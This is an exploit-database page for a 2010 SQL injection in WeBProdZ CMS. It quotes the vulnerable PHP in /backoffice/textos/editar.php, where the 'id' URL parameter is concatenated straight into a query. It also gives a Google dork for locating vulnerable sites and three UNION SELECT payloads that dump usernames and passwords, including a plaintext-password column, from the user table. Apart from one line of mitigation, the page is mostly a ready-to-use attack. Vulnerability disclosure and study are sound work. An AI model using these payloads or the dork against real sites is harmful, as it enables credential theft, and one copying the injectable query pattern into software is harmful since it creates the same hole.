header-logo
Suggest Exploit
vendor:
WeBProdZ CMS
by:
MasterGipy
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WeBProdZ CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

WeBProdZ CMS SQL Injection Vulnerability

WeBProdZ CMS is vulnerable to SQL Injection. The vulnerable code is present in the /backoffice/textos/editar.php file. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable parameter 'id' in the URL. For example, an attacker can send the following malicious SQL queries: -1 UNION ALL SELECT 1,2,3--, -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--, -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

      ______                _       _   _             
      | ___ \              | |     | | (_)            
      | |_/ /_____   _____ | |_   _| |_ _  ___  _ __  
      |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
      | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |   
      \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

        _____                      _____  _____ 
       |_   _|                    |  _  ||  _  |
         | | ___  __ _ _ __ ___   | |/' || |_| |
         | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
         | |  __/ (_| | | | | | | \ |_/ /.___/ /
         \_/\___|\__,_|_| |_| |_|  \___/ \____/

_____________________________________________________________
   
[$] Exploit Title     : WeBProdZ CMS SQL Injection Vulnerability
[$] Date              : 06-05-2010            
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : SQL Injection Vulnerability
[$] Google Dork       : "Desenvolvido por WeBProdZ"

[$] Vulnerable code in /backoffice/textos/editar.php

<?php 
    include_once("../../ligacao/connDB.php");
    $sql = "select * from textos where idtextos=".$_GET["id"];
        
    $j2 = mysql_query($sql);
    $o=mysql_fetch_object($j2);
?>

[$] Exploit

[+] http://[site]/backoffice/textos/editar.php?id=1  <- SQL

[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--


[$] Greetings from PORTUGAL ^^

Navigation

Suggest Exploit

Services By CQR